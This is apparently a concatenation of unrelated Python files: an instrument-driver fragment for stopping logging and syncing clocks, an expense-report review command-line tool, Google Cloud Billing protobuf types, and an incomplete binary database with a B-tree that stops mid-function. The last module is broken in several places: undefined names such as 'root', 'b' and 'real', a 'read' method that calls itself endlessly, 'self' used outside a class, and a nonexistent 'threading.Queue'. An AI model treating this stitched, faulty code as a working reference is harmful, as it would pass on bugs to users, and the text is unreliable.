log.debug("Attempting to stop the instrument logging.")
result = self._do_cmd_resp(Command.STOP, expected_prompt=[Prompt.STOPPED, Prompt.SYNC, Prompt.GO])
log.debug("Stop Command Result: %s", result)
# If we are still logging then let's wait until we are not
# syncing before resending the command.
if(self._is_logging()):
self._wait_for_sync()
log.debug("Attempting to stop the instrument again.")
result = self._do_cmd_resp(Command.STOP, expected_prompt=[Prompt.STOPPED, Prompt.SYNC, Prompt.GO])
log.debug("Stop Command Result: %s", result)
def _wait_for_sync(self):
"""
When the instrument is syncing internal parameters we can't stop
logging. So we will watch the logging status and when it is not
synchronizing we will return. Basically we will just block
until we are no longer syncing.
@raise InstrumentProtocolException when we timeout waiting for a
transition.
"""
timeout = time.time() + SYNC_TIMEOUT
while(time.time() < timeout):
result = self._do_cmd_resp(Command.STAT, expected_prompt=[Prompt.STOPPED, Prompt.SYNC, Prompt.GO])
match = LOGGING_SYNC_COMPILED.match(result)
if(match):
log.debug("We are still in sync mode. Wait a bit and retry")
time.sleep(2)
else:
log.debug("Transitioned out of sync.")
return True
# We timed out
raise InstrumentProtocolException("failed to transition out of sync mode")
def _is_logging(self):
"""
Run the status command to determine if we are in command or autosample
mode.
@return: True if sampling, false if not, None if we can't determine
"""
log.debug("_is_logging: start")
result = self._do_cmd_resp(Command.STAT, expected_prompt=[Prompt.STOPPED, Prompt.GO])
log.debug("Checking logging status from %s", result)
match = LOGGING_STATUS_COMPILED.match(result)
if not match:
log.error("Unable to determine logging status from: %s", result)
return None
if match.group(1) == 'GO':
log.debug("Looks like we are logging: %s", match.group(1))
return True
else:
log.debug("Looks like we are NOT logging: %s", match.group(1))
return False
def _ensure_autosample_config(self):
scheduler_config = self._get_scheduler_config()
if (scheduler_config == None):
log.debug("_ensure_autosample_config: adding scheduler element to _startup_config")
self._startup_config[DriverConfigKey.SCHEDULER] = {}
scheduler_config = self._get_scheduler_config()
log.debug("_ensure_autosample_config: adding autosample config to _startup_config")
config = {DriverSchedulerConfigKey.TRIGGER: {
DriverSchedulerConfigKey.TRIGGER_TYPE: TriggerType.INTERVAL,
DriverSchedulerConfigKey.SECONDS: self._param_dict.get(Parameter.SAMPLE_INTERVAL)}}
self._startup_config[DriverConfigKey.SCHEDULER][AUTO_SAMPLE_SCHEDULED_JOB] = config
if(not self._scheduler):
self.initialize_scheduler()
def _sync_clock(self, *args, **kwargs):
"""
sync clock close to a second edge
@retval (next_state, (next_agent_state, result)) tuple, (None, (None, None)).
@throws InstrumentTimeoutException if device respond correctly.
@throws InstrumentProtocolException if command could not be built or misunderstood.
"""
next_state = None
next_agent_state = None
result = None
time_format = "%Y/%m/%d %H:%M:%S"
str_val = get_timestamp_delayed(time_format)
log.debug("Setting instrument clock to '%s'", str_val)
self._do_cmd_resp(Command.SET_CLOCK, str_val, expected_prompt=Prompt.CR_NL)
def _wakeup(self, timeout):
"""There is no wakeup sequence for this instrument"""
pass
def _build_driver_dict(self):
"""
Populate the driver dictionary with options
"""
self._driver_dict.add(DriverDictKey.VENDOR_SW_COMPATIBLE, False)
def _build_command_dict(self):
"""
Populate the command dictionary with command.
"""
self._cmd_dict.add(Capability.START_AUTOSAMPLE, display_name="Start Autosample")
self._cmd_dict.add(Capability.STOP_AUTOSAMPLE, display_name="Stop Autosample")
self._cmd_dict.add(Capability.CLOCK_SYNC, display_name="Synchronize Clock")
self._cmd_dict.add(Capability.ACQUIRE_STATUS, display_name="Acquire Status")
self._cmd_dict.add(Capability.ACQUIRE_SAMPLE, display_name="Acquire Sample")
self._cmd_dict.add(Capability.FLASH_STATUS, display_name="Flash Status")
def _build_param_dict(self):
"""
Populate the parameter dictionary with XR-420 parameters.
For each parameter key add value formatting function for set commands.
"""
# The parameter dictionary.
self._param_dict = ProtocolParameterDict()
# Add parameter handlers to parameter dictionary for instrument configuration parameters.
self._param_dict.add(Parameter.CLOCK,
r'(.*)\r\n',
lambda match : match.group(1),
lambda string : str(string),
type=ParameterDictType.STRING,
display_name="clock",
expiration=0,
visibility=ParameterDictVisibility.READ_ONLY)
self._param_dict.add(Parameter.SAMPLE_INTERVAL,
r'Not used. This parameter is not parsed from instrument response',
None,
self._int_to_string,
type=ParameterDictType.INT,
default_value=30,
value=30,
startup_param=True,
display_name="sample_interval",
visibility=ParameterDictVisibility.IMMUTABLE)
def _update_params(self, *args, **kwargs):
"""
Update the parameter dictionary.
"""
log.debug("_update_params:")
# Issue clock command and parse results.
# This is the only parameter and it is always changing so don't bother with the 'change' event
self._do_cmd_resp(Command.GET_CLOCK)
def _build_set_clock_command(self, cmd, val):
"""
Build handler for set clock command (cmd=val followed by newline).
@param cmd the string for setting the clock (this should equal #CLOCK=).
@param val the parameter value to set.
@ retval The set command to be sent to the device.
"""
cmd = '%s%s' %(cmd, val) + NEWLINE
return cmd
def _parse_clock_response(self, response, prompt):
"""
Parse handler for clock command.
@param response command response string.
@param prompt prompt following command response.
@throws InstrumentProtocolException if clock command misunderstood.
"""
log.debug("_parse_clock_response: response=%s, prompt=%s" %(response, prompt))
if prompt not in [Prompt.CR_NL]:
raise InstrumentProtocolException('CLOCK command not recognized: %s.' % response)
if not self._param_dict.update(response):
raise InstrumentProtocolException('CLOCK command not parsed: %s.' % response)
return
def _parse_fs_response(self, response, prompt):
"""
Parse handler for FS command.
@param response command response string.
@param prompt prompt following command response.
@throws InstrumentProtocolException if FS command misunderstood.
"""
log.debug("_parse_fs_response: response=%s, prompt=%s" %(response, prompt))
if prompt not in [Prompt.FS]:
raise InstrumentProtocolException('FS command not recognized: %s.' % response)
return response
def _parse_common_response(self, response, prompt):
"""
Parse handler for common commands.
@param response command response string.
@param prompt prompt following command response.
"""
return response
|
|
import csv
import optparse
import os
import textwrap
import sys
from .. import NoSuchReport
from .. import approve_report
from .. import get_report_info
from .. import initialize_gcloud
from .. import list_reports
from .. import reject_report
class InvalidCommandLine(ValueError):
pass
class NotACommand(object):
def __init__(self, bogus):
self.bogus = bogus
def __call__(self):
raise InvalidCommandLine('Not a command: %s' % self.bogus)
def _get_csv(args):
try:
csv_file, = args
except:
raise InvalidCommandLine('Specify one CSV file')
csv_file = os.path.abspath(os.path.normpath(csv_file))
if not os.path.exists(csv_file):
raise InvalidCommandLine('Invalid CSV file: %s' % csv_file)
with open(csv_file) as f:
return csv_file, list(csv.DictReader(f))
class ListReports(object):
"""List expense reports according to specified criteria.
"""
def __init__(self, submitter, *args):
self.submitter = submitter
args = list(args)
parser = optparse.OptionParser(
usage="%prog [OPTIONS]")
parser.add_option(
'-e', '--employee-id',
action='store',
dest='employee_id',
default=None,
help="ID of the employee whose expense reports to list")
parser.add_option(
'-s', '--status',
action='store',
dest='status',
default=None,
help="Status of expense reports to list")
options, args = parser.parse_args(args)
self.employee_id = options.employee_id
self.status = options.status
def __call__(self):
_cols = [
('employee_id', 'Employee ID'),
('report_id', 'Report ID'),
('created', 'Created'),
('updated', 'Updated'),
('description', 'Description'),
('status', 'Status'),
('memo', 'Memo'),
]
writer = csv.writer(sys.stdout)
writer.writerow([x[1] for x in _cols])
for report in list_reports(self.employee_id, self.status):
writer.writerow([report[x[0]] for x in _cols])
class ShowReport(object):
"""Dump the contents of a given expense report.
"""
def __init__(self, submitter, *args):
self.submitter = submitter
args = list(args)
parser = optparse.OptionParser(
usage="%prog [OPTIONS] EMPLOYEE_ID REPORT_ID")
_, args = parser.parse_args(args)
try:
self.employee_id, self.report_id, = args
except:
raise InvalidCommandLine('Specify employee ID, report ID')
def __call__(self):
_cols = ['Date', 'Vendor', 'Type', 'Quantity', 'Price', 'Memo']
try:
info = get_report_info(self.employee_id, self.report_id)
except NoSuchReport:
self.submitter.blather("No such report: %s/%s"
% (self.employee_id, self.report_id))
else:
self.submitter.blather("Employee-ID: %s" % info['employee_id'])
self.submitter.blather("Report-ID: %s" % info['report_id'])
self.submitter.blather("Report-Status: %s" % info['status'])
self.submitter.blather("Created: %s" % info['created'])
self.submitter.blather("Updated: %s" % info['updated'])
self.submitter.blather("Description: %s" % info['description'])
self.submitter.blather("")
writer = csv.writer(sys.stdout)
writer.writerow([x for x in _cols])
for item in info['items']:
writer.writerow([item[x] for x in _cols])
class ApproveReport(object):
"""Approve a given expense report.
"""
def __init__(self, submitter, *args):
self.submitter = submitter
args = list(args)
parser = optparse.OptionParser(
usage="%prog [OPTIONS] EMPLOYEE_ID REPORT_ID")
parser.add_option(
'-c', '--check-number',
action='store',
dest='check_number',
default='',
help="Check number issued to pay the expense report")
options, args = parser.parse_args(args)
try:
self.employee_id, self.report_id, = args
except:
raise InvalidCommandLine('Specify employee ID, report ID')
self.check_number = options.check_number
def __call__(self):
approve_report(self.employee_id, self.report_id, self.check_number)
memo = ('' if self.check_number is None else
', check #%s' % self.check_number)
self.submitter.blather("Approved report: %s/%s%s" %
(self.employee_id, self.report_id, memo))
class RejectReport(object):
"""Reject a given expense report.
"""
def __init__(self, submitter, *args):
self.submitter = submitter
args = list(args)
parser = optparse.OptionParser(
usage="%prog [OPTIONS] EMPLOYEE_ID REPORT_ID")
parser.add_option(
'-r', '--reason',
action='store',
dest='reason',
default=None,
help="Reason for rejecting the expense report")
options, args = parser.parse_args(args)
try:
self.employee_id, self.report_id, = args
except:
raise InvalidCommandLine('Specify employee ID, report ID')
self.reason = options.reason
def __call__(self):
reject_report(self.employee_id, self.report_id, self.reason)
memo = ('' if self.reason is None else ', reason: %s' % self.reason)
self.submitter.blather("Rejected report: %s/%s%s" %
(self.employee_id, self.report_id, memo))
_COMMANDS = {
'list': ListReports,
'show': ShowReport,
'approve': ApproveReport,
'reject': RejectReport,
}
def get_description(command):
klass = _COMMANDS[command]
doc = getattr(klass, '__doc__', '')
if doc is None:
return ''
return ' '.join([x.lstrip() for x in doc.split('\n')])
class ReviewExpenses(object):
""" Driver for the :command:`review_expenses` command-line script.
"""
def __init__(self, argv=None, logger=None):
self.commands = []
if logger is None:
logger = self._print
self.logger = logger
self.parse_arguments(argv)
def parse_arguments(self, argv=None):
""" Parse subcommands and their options from an argv list.
"""
# Global options (not bound to sub-command)
mine = []
queue = [(None, mine)]
def _recordCommand(arg):
if arg is not None:
queue.append((arg, []))
for arg in argv:
if arg in _COMMANDS:
_recordCommand(arg)
else:
queue[-1][1].append(arg)
_recordCommand(None)
usage = ("%prog [GLOBAL_OPTIONS] "
"[command [COMMAND_OPTIONS]* [COMMAND_ARGS]]")
parser = optparse.OptionParser(usage=usage)
parser.add_option(
'-s', '--help-commands',
action='store_true',
dest='help_commands',
help="Show command help")
parser.add_option(
'-q', '--quiet',
action='store_const', const=0,
dest='verbose',
help="Run quietly")
parser.add_option(
'-v', '--verbose',
action='count',
dest='verbose',
default=1,
help="Increase verbosity")
options, args = parser.parse_args(mine)
self.options = options
for arg in args:
self.commands.append(NotACommand(arg))
options.help_commands = True
if options.help_commands:
keys = sorted(_COMMANDS.keys())
self.error('Valid commands are:')
for x in keys:
self.error(' %s' % x)
doc = get_description(x)
if doc:
self.error(textwrap.fill(doc,
initial_indent=' ',
subsequent_indent=' '))
return
for command_name, args in queue:
if command_name is not None:
command = _COMMANDS[command_name](self, *args)
self.commands.append(command)
def __call__(self):
""" Invoke sub-commands parsed by :meth:`parse_arguments`.
"""
if not self.commands:
raise InvalidCommandLine('No commands specified')
for command in self.commands:
command()
def _print(self, text): # pragma NO COVERAGE
sys.stdout.write('%s\n' % text)
def error(self, text):
self.logger(text)
def blather(self, text, min_level=1):
if self.options.verbose >= min_level:
self.logger(text)
def main(argv=sys.argv[1:]):
initialize_gcloud()
try:
ReviewExpenses(argv)()
except InvalidCommandLine as e: # pragma NO COVERAGE
sys.stdout.write('%s\n' % (str(e)))
sys.exit(1)
|
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
from google.type import money_pb2 # type: ignore
__protobuf__ = proto.module(
package="google.cloud.billing.v1",
manifest={
"Service",
"Sku",
"Category",
"PricingInfo",
"PricingExpression",
"AggregationInfo",
"ListServicesRequest",
"ListServicesResponse",
"ListSkusRequest",
"ListSkusResponse",
},
)
class Service(proto.Message):
r"""Encapsulates a single service in Google Cloud Platform.
Attributes:
name (str):
The resource name for the service.
Example: "services/DA34-426B-A397".
service_id (str):
The identifier for the service.
Example: "DA34-426B-A397".
display_name (str):
A human readable display name for this
service.
business_entity_name (str):
The business under which the service is
offered. Ex. "businessEntities/GCP",
"businessEntities/Maps".
"""
name = proto.Field(proto.STRING, number=1,)
service_id = proto.Field(proto.STRING, number=2,)
display_name = proto.Field(proto.STRING, number=3,)
business_entity_name = proto.Field(proto.STRING, number=4,)
class Sku(proto.Message):
r"""Encapsulates a single SKU in Google Cloud Platform
Attributes:
name (str):
The resource name for the SKU.
Example:
"services/DA34-426B-A397/skus/AA95-CD31-42FE".
sku_id (str):
The identifier for the SKU.
Example: "AA95-CD31-42FE".
description (str):
A human readable description of the SKU, has
a maximum length of 256 characters.
category (google.cloud.billing_v1.types.Category):
The category hierarchy of this SKU, purely
for organizational purpose.
service_regions (Sequence[str]):
List of service regions this SKU is offered
at. Example: "asia-east1"
Service regions can be found at
https://cloud.google.com/about/locations/
pricing_info (Sequence[google.cloud.billing_v1.types.PricingInfo]):
A timeline of pricing info for this SKU in
chronological order.
service_provider_name (str):
Identifies the service provider.
This is 'Google' for first party services in
Google Cloud Platform.
"""
name = proto.Field(proto.STRING, number=1,)
sku_id = proto.Field(proto.STRING, number=2,)
description = proto.Field(proto.STRING, number=3,)
category = proto.Field(proto.MESSAGE, number=4, message="Category",)
service_regions = proto.RepeatedField(proto.STRING, number=5,)
pricing_info = proto.RepeatedField(proto.MESSAGE, number=6, message="PricingInfo",)
service_provider_name = proto.Field(proto.STRING, number=7,)
class Category(proto.Message):
r"""Represents the category hierarchy of a SKU.
Attributes:
service_display_name (str):
The display name of the service this SKU
belongs to.
resource_family (str):
The type of product the SKU refers to.
Example: "Compute", "Storage", "Network",
"ApplicationServices" etc.
resource_group (str):
A group classification for related SKUs.
Example: "RAM", "GPU", "Prediction", "Ops",
"GoogleEgress" etc.
usage_type (str):
Represents how the SKU is consumed.
Example: "OnDemand", "Preemptible", "Commit1Mo",
"Commit1Yr" etc.
"""
service_display_name = proto.Field(proto.STRING, number=1,)
resource_family = proto.Field(proto.STRING, number=2,)
resource_group = proto.Field(proto.STRING, number=3,)
usage_type = proto.Field(proto.STRING, number=4,)
class PricingInfo(proto.Message):
r"""Represents the pricing information for a SKU at a single
point of time.
Attributes:
effective_time (google.protobuf.timestamp_pb2.Timestamp):
The timestamp from which this pricing was effective within
the requested time range. This is guaranteed to be greater
than or equal to the start_time field in the request and
less than the end_time field in the request. If a time range
was not specified in the request this field will be
equivalent to a time within the last 12 hours, indicating
the latest pricing info.
summary (str):
An optional human readable summary of the
pricing information, has a maximum length of 256
characters.
pricing_expression (google.cloud.billing_v1.types.PricingExpression):
Expresses the pricing formula. See ``PricingExpression`` for
an example.
aggregation_info (google.cloud.billing_v1.types.AggregationInfo):
Aggregation Info. This can be left
unspecified if the pricing expression doesn't
require aggregation.
currency_conversion_rate (float):
Conversion rate used for currency conversion, from USD to
the currency specified in the request. This includes any
surcharge collected for billing in non USD currency. If a
currency is not specified in the request this defaults to
1.0. Example: USD \* currency_conversion_rate = JPY
"""
effective_time = proto.Field(
proto.MESSAGE, number=1, message=timestamp_pb2.Timestamp,
)
summary = proto.Field(proto.STRING, number=2,)
pricing_expression = proto.Field(
proto.MESSAGE, number=3, message="PricingExpression",
)
aggregation_info = proto.Field(proto.MESSAGE, number=4, message="AggregationInfo",)
currency_conversion_rate = proto.Field(proto.DOUBLE, number=5,)
class PricingExpression(proto.Message):
r"""Expresses a mathematical pricing formula. For Example:-
``usage_unit: GBy`` ``tiered_rates:``
``[start_usage_amount: 20, unit_price: $10]``
``[start_usage_amount: 100, unit_price: $5]``
The above expresses a pricing formula where the first 20GB is free,
the next 80GB is priced at $10 per GB followed by $5 per GB for
additional usage.
Attributes:
usage_unit (str):
The short hand for unit of usage this pricing is specified
in. Example: usage_unit of "GiBy" means that usage is
specified in "Gibi Byte".
usage_unit_description (str):
The unit of usage in human readable form.
Example: "gibi byte".
base_unit (str):
The base unit for the SKU which is the unit
used in usage exports. Example: "By".
base_unit_description (str):
The base unit in human readable form.
Example: "byte".
base_unit_conversion_factor (float):
Conversion factor for converting from price per usage_unit
to price per base_unit, and start_usage_amount to
start_usage_amount in base_unit. unit_price /
base_unit_conversion_factor = price per base_unit.
start_usage_amount \* base_unit_conversion_factor =
start_usage_amount in base_unit.
display_quantity (float):
The recommended quantity of units for displaying pricing
info. When displaying pricing info it is recommended to
display: (unit_price \* display_quantity) per
display_quantity usage_unit. This field does not affect the
pricing formula and is for display purposes only. Example:
If the unit_price is "0.0001 USD", the usage_unit is "GB"
and the display_quantity is "1000" then the recommended way
of displaying the pricing info is "0.10 USD per 1000 GB".
tiered_rates (Sequence[google.cloud.billing_v1.types.PricingExpression.TierRate]):
The list of tiered rates for this pricing. The total cost is
computed by applying each of the tiered rates on usage. This
repeated list is sorted by ascending order of
start_usage_amount.
"""
class TierRate(proto.Message):
r"""The price rate indicating starting usage and its
corresponding price.
Attributes:
start_usage_amount (float):
Usage is priced at this rate only after this amount.
Example: start_usage_amount of 10 indicates that the usage
will be priced at the unit_price after the first 10
usage_units.
unit_price (google.type.money_pb2.Money):
The price per unit of usage. Example: unit_price of amount
$10 indicates that each unit will cost $10.
"""
start_usage_amount = proto.Field(proto.DOUBLE, number=1,)
unit_price = proto.Field(proto.MESSAGE, number=2, message=money_pb2.Money,)
usage_unit = proto.Field(proto.STRING, number=1,)
usage_unit_description = proto.Field(proto.STRING, number=4,)
base_unit = proto.Field(proto.STRING, number=5,)
base_unit_description = proto.Field(proto.STRING, number=6,)
base_unit_conversion_factor = proto.Field(proto.DOUBLE, number=7,)
display_quantity = proto.Field(proto.DOUBLE, number=2,)
tiered_rates = proto.RepeatedField(proto.MESSAGE, number=3, message=TierRate,)
class AggregationInfo(proto.Message):
r"""Represents the aggregation level and interval for pricing of
a single SKU.
Attributes:
aggregation_level (google.cloud.billing_v1.types.AggregationInfo.AggregationLevel):
aggregation_interval (google.cloud.billing_v1.types.AggregationInfo.AggregationInterval):
aggregation_count (int):
The number of intervals to aggregate over. Example: If
aggregation_level is "DAILY" and aggregation_count is 14,
aggregation will be over 14 days.
"""
class AggregationLevel(proto.Enum):
r"""The level at which usage is aggregated to compute cost.
Example: "ACCOUNT" aggregation level indicates that usage for
tiered pricing is aggregated across all projects in a single
account.
"""
AGGREGATION_LEVEL_UNSPECIFIED = 0
ACCOUNT = 1
PROJECT = 2
class AggregationInterval(proto.Enum):
r"""The interval at which usage is aggregated to compute cost.
Example: "MONTHLY" aggregation interval indicates that usage for
tiered pricing is aggregated every month.
"""
AGGREGATION_INTERVAL_UNSPECIFIED = 0
DAILY = 1
MONTHLY = 2
aggregation_level = proto.Field(proto.ENUM, number=1, enum=AggregationLevel,)
aggregation_interval = proto.Field(proto.ENUM, number=2, enum=AggregationInterval,)
aggregation_count = proto.Field(proto.INT32, number=3,)
class ListServicesRequest(proto.Message):
r"""Request message for ``ListServices``.
Attributes:
page_size (int):
Requested page size. Defaults to 5000.
page_token (str):
A token identifying a page of results to return. This should
be a ``next_page_token`` value returned from a previous
``ListServices`` call. If unspecified, the first page of
results is returned.
"""
page_size = proto.Field(proto.INT32, number=1,)
page_token = proto.Field(proto.STRING, number=2,)
class ListServicesResponse(proto.Message):
r"""Response message for ``ListServices``.
Attributes:
services (Sequence[google.cloud.billing_v1.types.Service]):
A list of services.
next_page_token (str):
A token to retrieve the next page of results. To retrieve
the next page, call ``ListServices`` again with the
``page_token`` field set to this value. This field is empty
if there are no more results to retrieve.
"""
@property
def raw_page(self):
return self
services = proto.RepeatedField(proto.MESSAGE, number=1, message="Service",)
next_page_token = proto.Field(proto.STRING, number=2,)
class ListSkusRequest(proto.Message):
r"""Request message for ``ListSkus``.
Attributes:
parent (str):
Required. The name of the service.
Example: "services/DA34-426B-A397".
start_time (google.protobuf.timestamp_pb2.Timestamp):
Optional inclusive start time of the time range for which
the pricing versions will be returned. Timestamps in the
future are not allowed. The time range has to be within a
single calendar month in America/Los_Angeles timezone. Time
range as a whole is optional. If not specified, the latest
pricing will be returned (up to 12 hours old at most).
end_time (google.protobuf.timestamp_pb2.Timestamp):
Optional exclusive end time of the time range for which the
pricing versions will be returned. Timestamps in the future
are not allowed. The time range has to be within a single
calendar month in America/Los_Angeles timezone. Time range
as a whole is optional. If not specified, the latest pricing
will be returned (up to 12 hours old at most).
currency_code (str):
The ISO 4217 currency code for the pricing info in the
response proto. Will use the conversion rate as of
start_time. Optional. If not specified USD will be used.
page_size (int):
Requested page size. Defaults to 5000.
page_token (str):
A token identifying a page of results to return. This should
be a ``next_page_token`` value returned from a previous
``ListSkus`` call. If unspecified, the first page of results
is returned.
"""
parent = proto.Field(proto.STRING, number=1,)
start_time = proto.Field(proto.MESSAGE, number=2, message=timestamp_pb2.Timestamp,)
end_time = proto.Field(proto.MESSAGE, number=3, message=timestamp_pb2.Timestamp,)
currency_code = proto.Field(proto.STRING, number=4,)
page_size = proto.Field(proto.INT32, number=5,)
page_token = proto.Field(proto.STRING, number=6,)
class ListSkusResponse(proto.Message):
r"""Response message for ``ListSkus``.
Attributes:
skus (Sequence[google.cloud.billing_v1.types.Sku]):
The list of public SKUs of the given service.
next_page_token (str):
A token to retrieve the next page of results. To retrieve
the next page, call ``ListSkus`` again with the
``page_token`` field set to this value. This field is empty
if there are no more results to retrieve.
"""
@property
def raw_page(self):
return self
skus = proto.RepeatedField(proto.MESSAGE, number=1, message="Sku",)
next_page_token = proto.Field(proto.STRING, number=2,)
__all__ = tuple(sorted(__protobuf__.manifest))
|
|
'''
doc
'''
import os
import bisect
import itertools
import functools
import operator
import enum
import sys
import lzma
import threading
import time
import hashlib
import random
import re
@enum.unique
class Op(enum.Enum):
'''
doc
'''
def __init__(self):
'''
doc
'''
super().__init__()
object = b'\x01'
number = b'\x02'
real = b'\x03'
array = b'\x04'
string = b'\x05'
true = b'\x06'
false = b'\x07'
custom = b'\x08'
null = b'\x09'
append = b'\x0A'
replace = b'\x0B'
ref_value = b'\x0C'
ref_append = b'\x0D'
ref_replace = b'\x0E'
def generate_uuid():
'''
doc
'''
mapping = {8: '-', 13: '-', 14: '4', 18: '-', 23: '-'}
mapping[19] = random.SystemRandom().choice('89AB')
return ''.join(
mapping.get(i) or random.SystemRandom().choice('0123456789ABCDEF')
for i in range(31))
class Database:
'''
doc
'''
def __init__(self, folder, nblock, sblock):
'''
doc
'''
self.blocks = Blocks(folder, nblock, sblock)
block_size = 1024 * 1024 * sblock
if len(root.data) == 0:
root.append_data(b''.join((
b'\x01\xFF', b'\x00' * (block_size - 2))))
if len(root.data) != block_size:
raise ValueError('block size of {}MB does not match {}'.format(
sblock, os.path.join(folder, 'ROOT')
))
self.folder = folder
self.sblock = sblock
self.offset_length = block_size.bit_length() // 8 + 1
def read(self, db, table):
'''
doc
'''
return self.read(db, table)
def write(self, db, table, obj):
'''
doc
'''
self.obj = write_dict({'public': {db: {table: [obj]}}})
def update(self, db, table, old, new):
'''
doc
'''
def delete(self, db, table, obj):
'''
doc
'''
def write_op(self, op):
'''
doc
'''
return self.write_bytes(op.value + b'\xFF\xFF')
def write_var_obj(self, op, bytes_):
'''
doc
'''
return self.write_bytes(create_var_obj(op, bytes_))
def write_bytes(self, bytes_):
'''
doc
'''
offset = bytes(self.offset_length)
file = bytes(32)
port = bytes(4)
ref = port + file + offset
return ref
def get_length(bytes_):
'''
doc
'''
i = len(bytes_)
while i:
i, b = divmod(i, 0xFF)
yield b
def create_var_obj(op, bytes_):
'''
doc
'''
bytes_ = lzma.compress(bytes_)
return b'\xFF'.join((op.value, bytes(get_length(bytes_)), bytes_))
@functools.singledispatch
def write_val(value, db):
'''
doc
'''
raise NotImplemented(type(value))
@write_val.register(bool)
def write_bool(bool_, db):
'''
doc
'''
return db.write_op(Op.true if b else Op.false)
@write_val.register(type(None))
def write_None(_, db):
'''
doc
'''
return db.write_op(Op.null)
@write_val.register(int)
def write_integer(integer, db):
'''
doc
'''
return db.write_var_obj(
Op.number,
integer.to_bytes(
integer.bit_length() // 8 + 1,
sys.byteorder,
signed=True
)
)
@write_val.register(float)
def write_float(float_, db):
'''
doc
'''
num, den = real.as_integer_ratio()
length = max(num.bit_length(), den.bit_length()) // 8 + 1
return db.write_var_obj(
Op.real,
b''.join((
num.to_bytes(length, sys.byteorder, signed=True),
den.to_bytes(length, sys.byteorder, signed=True)
))
)
@write_val.register(str)
def write_string(string, db):
'''
doc
'''
return db.write_var_obj(Op.string, string.encode())
@write_val.register(dict)
def write_dict(dict_, db):
'''
doc
'''
return db.write_var_obj(
Op.object,
BTree({
key: self.write_val(value, db)
for key, value in obj
}).encode()
)
@write_val.register(list)
def write_list(list_, db):
'''
doc
'''
return db.write_var_obj(
Op.array,
b''.join(map(
write_val,
list_,
itertools.repeat(db)
))
)
class Snapshot:
'''
doc
'''
queue = threading.Queue()
def __init__(self):
'''
doc
'''
self.queue.push(self)
def commit(self):
'''
doc
'''
class Blocks:
'''
doc
'''
def __init__(self, folder, nblock, sblock):
'''
doc
'''
self.sblock = sblock
self.nblock = nblock
self.folder = folder
data = bytearray()
try:
with open(os.path.join(folder, 'ROOT'), 'rb') as io:
data += io.read()
except FileNotFoundError:
with open(os.path.join(folder, 'ROOT'), 'wb') as io:
pass
self.table = {'ROOT': data}
self.lru = {time.time(): 'ROOT'}
def read_from(self, file, start, length):
'''
doc
'''
data = bytearray()
try:
data = self.table[file]
except KeyError:
try:
with open(os.path.join(folder, file), 'rb') as io:
data = io.read()
except FileNotFoundError:
with open(os.path.join(folder, file), 'wb') as io:
pass
data = bytearray(self.sblock)
self.table[file] = data
self.lru[time.time()] = file
return data[start: start + length]
def append_data(self, file, start, blob):
'''
doc
'''
try:
self.table[file][start: start + len(blob)] = blob
with open(os.path.join(folder, file), 'wb') as io:
io.write(self.table[file])
except KeyError:
try:
with open(os.path.join(folder, file), 'rb') as io:
data = io.read()
except FileNotFoundError:
data = bytearray(self.sblock)
finally:
data[start: start + len(blob)] = blob
with open(os.path.join(folder, file), 'wb') as io:
io.write(data)
class _BNode(object):
'''
doc
'''
__slots__ = ["tree", "contents", "children"]
def __init__(self, tree, contents=None, children=None):
'''
doc
'''
self.tree = tree
self.contents = contents or []
self.children = children or []
if self.children:
assert len(self.contents) + 1 == len(self.children), \
"one more child than data item required"
def compose(self):
'''
doc
'''
if self.children:
children = iter(self.children)
yield tuple(next(children).compose())
for content in self.contents:
yield content
yield tuple(next(children).compose())
else:
yield from self.contents
def lateral(self, parent, parent_index, dest, dest_index):
'''
doc
'''
if parent_index > dest_index:
dest.contents.append(parent.contents[dest_index])
parent.contents[dest_index] = self.contents.pop(0)
if self.children:
dest.children.append(self.children.pop(0))
else:
dest.contents.insert(0, parent.contents[parent_index])
parent.contents[parent_index] = self.contents.pop()
if self.children:
dest.children.insert(0, self.children.pop())
def shrink(self, ancestors):
'''
doc
'''
parent = None
if ancestors:
parent, parent_index = ancestors.pop()
# try to lend to the left neighboring sibling
if parent_index:
left_sib = parent.children[parent_index - 1]
if len(left_sib.contents) < self.tree.order:
self.lateral(
parent, parent_index, left_sib, parent_index - 1)
return
# try the right neighbor
if parent_index + 1 < len(parent.children):
right_sib = parent.children[parent_index + 1]
if len(right_sib.contents) < self.tree.order:
self.lateral(
parent, parent_index, right_sib, parent_index + 1)
return
center = len(self.contents) // 2
sibling, push = self.split()
if not parent:
parent, parent_index = self.tree.BRANCH(
self.tree, children=[self]), 0
self.tree._root = parent
# pass the median up to the parent
parent.contents.insert(parent_index, push)
parent.children.insert(parent_index + 1, sibling)
if len(parent.contents) > parent.tree.order:
parent.shrink(ancestors)
def grow(self, ancestors):
'''
doc
'''
parent, parent_index = ancestors.pop()
minimum = self.tree.order // 2
left_sib = right_sib = None
# try to borrow from the right sibling
if parent_index + 1 < len(parent.children):
right_sib = parent.children[parent_index + 1]
if len(right_sib.contents) > minimum:
right_sib.lateral(parent, parent_index + 1, self, parent_index)
return
# try to borrow from the left sibling
if parent_index:
left_sib = parent.children[parent_index - 1]
if len(left_sib.contents) > minimum:
left_sib.lateral(parent, parent_index - 1, self, parent_index)
return
# consolidate with a sibling - try left first
if left_sib:
left_sib.contents.append(parent.contents[parent_index - 1])
left_sib.contents.extend(self.contents)
if self.children:
left_sib.children.extend(self.children)
parent.contents.pop(parent_index - 1)
parent.children.pop(parent_index)
else:
self.contents.append(parent.contents[parent_index])
self.contents.extend(right_sib.contents)
if self.children:
self.children.extend(right_sib.children)
parent.contents.pop(parent_index)
parent.children.pop(parent_index + 1)
if len(parent.contents) < minimum:
if ancestors:
# parent is not the root
parent.grow(ancestors)
elif not parent.contents:
# parent is root, and its now empty
self.tree._root = left_sib or self
def split(self):
'''
doc
'''
center = len(self.contents) // 2
median = self.contents[center]
sibling = type(self)(
self.tree,
self.contents[center + 1:],
self.children[center + 1:])
self.contents = self.contents[:center]
self.children = self.children[:center + 1]
return sibling, median
def insert(self, index, item, ancestors):
'''
doc
'''
self.contents.insert(index, item)
if len(self.contents) > self.tree.order:
self.shrink(ancestors)
def remove(self, index, ancestors):
'''
doc
'''
minimum = self.tree.order // 2
if self.children:
